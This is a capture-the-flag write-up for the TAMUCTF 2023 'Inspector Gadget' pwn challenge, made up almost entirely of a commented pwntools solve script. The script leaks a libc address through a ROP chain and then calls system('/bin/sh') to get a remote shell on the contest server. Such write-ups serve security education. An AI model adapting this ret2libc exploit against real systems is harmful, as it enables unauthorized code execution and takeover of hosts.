Inspector Gadget
05/04/2023
By: unvariant
Tags: pwn, TAMUCTF-2023
Problem Description:
Inspector Gadget gave me this binary with one goal. pwn.
Hints:
None
Solve script
# Solve script for the TAMUCTF 2023 "Inspector Gadget" challenge.
#
# Flow, as the code below shows: a stack-overflow input is sent twice to the
# remote service. The first payload makes the binary leak the resolved libc
# address of puts() and then re-enter pwnme() for a second input; the second
# payload uses the leaked address to call system("/bin/sh") from libc.
#
# Defender's note: the gadget addresses below are absolute (0x40....), so the
# binary is evidently built without PIE, and the overflow reaches the saved
# return address, so stack protection appears to be absent — both would have
# to be inferred from the binary itself, which is not shown here. PIE/ASLR and
# stack canaries are the standard mitigations for this class of bug.
from pwn import *
# The challenge binary and its libc, used only for symbol/offset lookups.
file = ELF("./inspector-gadget")
libc = ELF("./libc.so.6")
# Remote target over TLS; the SNI selects the challenge instance.
p = remote("tamuctf.com", 443, ssl=True, sni="inspector-gadget")
# Gadget addresses hard-coded from the challenge binary. From their names,
# presumably a `pop rdi; ret` and a bare `ret` — not verifiable from this file.
rdi = 0x40127b
ret = 0x401016
# Payload 1: 16 bytes of filler up to the saved return address (offset assumed
# from the binary, not shown here), then the ROP chain.
attack = b"A" * 0x10
attack += p64(ret)                   # extra ret; likely for stack alignment — unverified
attack += p64(rdi)                   # rdi = address of puts@GOT ...
attack += p64(file.got["puts"])
attack += p64(file.plt["puts"])      # ... puts(puts@GOT) prints the resolved libc pointer
attack += p64(file.symbols["pwnme"]) # then return into pwnme for a second input
print(attack)
p.recvuntil(b"pwn me\n")
# Pad to 0x60 bytes; presumably the size the binary reads — confirm against the binary.
p.send(attack.ljust(0x60, b"\x00"))
# The leaked pointer arrives as 6 raw bytes (a user-space x86-64 address has
# two zero high bytes), so it is zero-extended to 8 before unpacking.
# NOTE(review): recv(6) can return fewer than 6 bytes on a slow connection;
# recvn(6) waits for the full count.
leak = p.recv(6)
leak = u64(leak + b"\x00\x00")
print(f"leak: {leak:x}")
# Rebase libc from the leaked puts address.
base = leak - libc.symbols["puts"]
print(f"base: {base:x}")
# Offset of a NUL-terminated "/bin/sh" string inside libc.
shell = next(libc.search(b"/bin/sh\x00"))
print(f"shell: {shell:x}")
# Payload 2: same layout, chain is now system("/bin/sh") inside libc.
attack = b"A" * 0x10
attack += p64(ret)
attack += p64(rdi)
attack += p64(base + shell)
attack += p64(base + libc.symbols["system"])
p.recvuntil(b"pwn me\n")
p.send(attack.ljust(0x60, b"\x00"))
p.interactive()